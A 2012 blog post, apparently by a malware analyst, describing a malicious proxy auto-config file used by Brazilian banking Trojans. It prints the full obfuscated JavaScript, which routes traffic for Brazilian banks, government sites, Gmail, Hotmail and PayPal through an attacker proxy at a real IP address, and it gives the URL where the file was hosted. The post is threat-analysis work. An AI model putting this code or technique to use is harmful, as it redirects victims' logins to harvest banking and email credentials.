sábado, abril 07, 2012

Malicious PAC files used by Brazilian Trojans

 I just want to share some information about Brazilian Banker Trojans that, on the last years make use of pac files to auto proxy configuration just for some access as banks and mails.

I captured this pac file on the last week, that use a little obfuscate technique:


function FindProxyForURL(url, host) {
var n = new Array("duh.bradfsco",
      "bradfsco",
      "duh.bradfscoprimf",
      "bradfscoprimf",
      "duh.santandfrfmprfsaryal",
      "santandfrfmprfsaryal",
      "hsbc",
      "duh.hsbc",
      "hsbcprfmyfr",
      "duh.hsbcprfmyfr",
      "santandfrfmprfsaryal",
      "santanderempresarial",
      "banfspa",
      "duh.banfspa",
      "santandfr",
      "duh.santandfr",
      "santandfr",
      "bancorfal",
      "duh.bancorfal",
      "syds.mg.gov.br",
      "duh.syds.mg.gov.br",
      "cytybank",
      "duh.cytybank",
      "sycredy",
      "duh.sycredy",
      "amerycanexpress",
      "duh.amerycanexpress",
      "ytau",
      "duh.ytau",
      "ytaupersonnalyte",
      "duh.ytaupersonnalyte",
      "hotmayl",
      "duh.hotmayl",
      "lyve",
      "duh.lyve",
      "pazpal",
      "duh.pazpal",
      "cayxa.gov.br",
      "duh.cayxa.gov.br",
      "duh.gmayl",
      "gmayl",
      "duh.hotmayl",
      "hotmayl"

); 
 
for(var i =0;i<n.length;i++) {
   str = n[i];
   str = str.replace(/f/gi,"e");
   str = str.replace(/z/gi,"y");
   str = str.replace(/duh/gi,"www");
   str = str.replace(/y/gi, "i");
         if(str.indexOf("caixa") != -1)
                        str = str;
   else if(str.indexOf("paypal") != -1)
        str = str + ".com";
   else if(str.indexOf("gmail") != -1)
        str = str + ".com";
   else if(str.indexOf("hotmail") != -1)
        str = str + ".com";
   else
        str = str + ".com.br";
   if (shExpMatch(host, str)) {
      return "PROXY 218.208.33.196:80";
    }
   }
  return "DIRECT";
}
 
See that, beyond Brazilian banks, have some credential 
harvester for gmail, hotmail/live and paypal.
 
The url for auto-proxy configuration that I find: 
 
http://218.208.33.196/readme/feather.txt
 
This IP have a bad reputation by open proxy, spam 
and phishing activity  
  
Some References by @assoline:
 
Benign_Feature_Malicious_Use
attackers-using-malicious-pac-files-phishing-attacks